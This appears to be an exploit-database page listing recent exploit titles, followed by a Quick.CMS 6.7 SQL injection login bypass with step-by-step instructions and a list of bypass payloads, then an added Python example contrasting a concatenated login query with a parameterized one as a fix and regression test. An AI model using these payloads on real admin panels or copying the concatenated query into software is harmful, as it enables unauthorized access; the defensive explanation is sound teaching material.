
13 changes to exploits/shellcodes/ghdb TELSAT marKoni FM Transmitter 1.9.5 - Backdoor Account Information Disclosure TELSAT marKoni FM Transmitter 1.9.5 - Insecure Access Control Change Password TELSAT marKoni FM Transmitter 1.9.5 - Root Command Injection Atlassian Confluence < 8.5.3 - Remote Code Execution Backdrop CMS 1.23.0 - Stored XSS Gibbon LMS < v26.0.00 - Authenticated RCE Quick.CMS 6.7 - SQL Injection Login Bypass TYPO3 11.5.24 - Path Traversal (Authenticated) WEBIGniter v28.7.23 - Stored XSS WordPress File Upload Plugin < 4.23.3 - Stored XSS xbtitFM 4.1.18 - Multiple Vulnerabilities ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE
# Exploit Title: Quick.CMS 6.7 SQL Injection Login Bypass
# Google Dork: N/A
# Date: 02-03-2024
# Exploit Author: ./H4X.Forensics - Diyar
# Vendor Homepage: https://www.opensolution.org
# Software Link: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip
# Version: 6.7
# Tested on: Windows
# CVE : N/A

How to exploit :

*--> Open Admin Panel Through : http://127.0.0.1:8080/admin.php
*--> Enter any Email like : root@root.com
*--> Enter SQL Injection Authentication Bypass Payload : ' or '1'='1
*--> Tick the Checkbox
*--> Press Login
*--> Congratz!

*--> SQL Injection Authentication Bypass Payload : ' or '1'='1

*--> Payloads that can be used :

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
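
Why these inputs get past a login check, and what fixes it, shown as an added example that is not code from the original page or from Quick.CMS: a login query built by string concatenation beside the same query with bound parameters. The schema, account, function names and the use of SQLite are assumptions made for illustration, as is the payload being typed into the password field.

```python
import sqlite3

# Constructed sample input: three of the payloads listed above that parse as SQLite syntax.
PAYLOADS = ["' or '1'='1", "' or ''='", "' or 1 or '"]

def make_db():
    # Hypothetical schema and account for this example; not Quick.CMS's own tables.
    # The plaintext column isolates the injection issue; real code stores a password hash.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (email TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin@example.test', 's3cret-Constructed')")
    return db

def login_concatenated(db, email, password):
    # Vulnerable pattern: user input becomes part of the SQL text.
    # With "' or '1'='1" the WHERE clause parses as
    # (email = '...' AND password = '') OR '1'='1', which is true for every row.
    query = ("SELECT 1 FROM admins WHERE email = '" + email +
             "' AND password = '" + password + "'")
    return db.execute(query).fetchone() is not None

def login_parameterized(db, email, password):
    # Hardened pattern: placeholders keep input as data, so quotes are never parsed as SQL.
    query = "SELECT 1 FROM admins WHERE email = ? AND password = ?"
    return db.execute(query, (email, password)).fetchone() is not None

def accepted_payloads(login):
    # Return the payloads that a given login function accepts for an unknown e-mail.
    db = make_db()
    return [p for p in PAYLOADS if login(db, "root@root.com", p)]

if __name__ == "__main__":
    print("concatenated accepts: ", accepted_payloads(login_concatenated))
    print("parameterized accepts:", accepted_payloads(login_parameterized))
```

The same pair of functions works as a regression test after patching: the parameterized form must reject every listed payload while still accepting the real credentials.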